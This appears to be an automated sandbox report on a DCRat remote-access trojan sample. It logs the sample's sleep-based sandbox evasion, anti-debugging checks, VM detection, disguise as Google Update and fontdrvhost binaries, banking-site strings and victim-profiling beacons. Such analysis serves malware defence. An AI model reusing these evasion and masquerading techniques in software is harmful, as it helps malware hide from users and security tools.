Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -598139s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -597843s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -595727s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -594281s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -593281s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -593062s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -592812s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -592562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -592265s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -591859s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -591562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -591234s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -590812s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -589703s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -589312s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -589078s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -588750s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -588484s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -588203s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -587920s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -587562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -586437s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -586001s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -585656s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -585453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -585140s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -584827s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -584468s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -584307s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -584203s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -584004s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -583703s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -583390s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -583258s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -583154s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -583042s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -582935s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -582816s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -582701s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -582593s >= -30000s	Jump to behavior
Source: C:\Recovery\fontdrvhost.exe TID: 7996	Thread sleep count: 364 > 30
Source: C:\Recovery\fontdrvhost.exe TID: 5300	Thread sleep count: 366 > 30
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe TID: 5716	Thread sleep count: 367 > 30
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe TID: 6276	Thread sleep count: 370 > 30
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe TID: 8028	Thread sleep time: -922337203685477s >= -30000s

Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\fontdrvhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\fontdrvhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	File Volume queried: C:\ FullSizeInformation

Source: 55GejWrhvb.20.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Blockruntime.exe, 00000004.00000002.1392680175.000000001BF4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5
Source: Setupx-64.exe, 00000000.00000003.1327216666.00000000033B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
Source: 55GejWrhvb.20.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 55GejWrhvb.20.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 55GejWrhvb.20.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 55GejWrhvb.20.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 55GejWrhvb.20.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Blockruntime.exe, 00000004.00000002.1392546956.000000001BF22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: upfc.exe, 00000014.00000002.2677160450.000000001C3C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: Blockruntime.exe, 00000004.00000002.1392933439.000000001BF5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5t`
Source: 55GejWrhvb.20.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 55GejWrhvb.20.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 55GejWrhvb.20.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: wscript.exe, 00000001.00000003.1332481462.0000000003251000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X
Source: 55GejWrhvb.20.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 55GejWrhvb.20.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 55GejWrhvb.20.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 55GejWrhvb.20.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 55GejWrhvb.20.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Blockruntime.exe, 00000004.00000002.1392546956.000000001BF22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
Source: 55GejWrhvb.20.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 55GejWrhvb.20.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 55GejWrhvb.20.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 55GejWrhvb.20.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 55GejWrhvb.20.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 55GejWrhvb.20.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Setupx-64.exe, RZctPlhC2XmeDKsE7v.exe.4.dr, StartMenuExperienceHost.exe.4.dr, Blockruntime.exe.0.dr	Binary or memory string: x15VBGHGfs8fhuYXM0y
Source: 55GejWrhvb.20.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 55GejWrhvb.20.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 55GejWrhvb.20.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 55GejWrhvb.20.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 55GejWrhvb.20.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 55GejWrhvb.20.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 55GejWrhvb.20.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 55GejWrhvb.20.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 55GejWrhvb.20.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 55GejWrhvb.20.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 55GejWrhvb.20.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\fontdrvhost.exe	Process token adjusted: Debug
Source: C:\Recovery\fontdrvhost.exe	Process token adjusted: Debug
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Process token adjusted: Debug
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008CF063 SetUnhandledExceptionFilter,	0_2_008CF063
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008CF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_008CF22B
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008D866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008D866F
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008CEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008CEF05

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Setupx-64.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Setupx-64.exe

Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"156 ms"}}
Source: upfc.exe, 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"235 ms"}}
Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"156 ms"}}H;
Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"157 ms"}}UC
Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"157 ms"}}H;
Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"158 ms"}}H;
Source: upfc.exe, 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"235 ms"}}H;
Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"158 ms"}}
Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"157 ms"}}

Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Queries volume information: C:\ComcontainerruntimeCrtNet\Blockruntime.exe VolumeInformation	Jump to behavior
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Queries volume information: C:\Program Files (x86)\Google\Update\upfc.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Recovery\fontdrvhost.exe	Queries volume information: C:\Recovery\fontdrvhost.exe VolumeInformation
Source: C:\Recovery\fontdrvhost.exe	Queries volume information: C:\Recovery\fontdrvhost.exe VolumeInformation
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Queries volume information: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe VolumeInformation
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Queries volume information: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe VolumeInformation

Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Users\All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eC:\Users\All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TC:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: upfc.exe, 00000014.00000002.2574244036.000000000618A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Source: Yara match	File source: 00000004.00000002.1377650559.0000000012C0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Blockruntime.exe PID: 7588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: upfc.exe PID: 5068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 6524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 7840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RZctPlhC2XmeDKsE7v.exe PID: 7188, type: MEMORYSTR
